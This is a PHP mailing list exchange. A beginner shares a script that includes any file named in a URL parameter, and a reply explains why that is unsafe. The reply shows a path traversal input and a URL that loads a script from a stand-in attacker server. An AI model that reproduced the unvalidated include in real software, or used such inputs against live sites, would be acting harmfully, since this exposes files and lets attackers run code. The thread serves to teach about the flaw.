Hi,
I'm new to PHP and I'd appreciate your advice a lot. I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use something like this: File "index.php": <? <a href=index.php?content=story.htm>story</a><br> <a href=index.php?content=about.htm>about</a><br> <? if(isset($content)): include $content; else: include "about.htm"; endif; ?>
But a guy told me it is not preferable to use this method because of security considerations. I'm sure there is a common way of building dynamic links; am I on wrong way?
You can search the list archives for posts regarding this topic (it comes up alot).
There are safer ways to do what you are doing. One simple way to "hack" your script as written above would be to type :
index.php?content=../some/secret/file.txt
or,
index.php?content=http://www.bad-server.com/badscript.php
in the browser's address bar.
Regards, Burhan
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
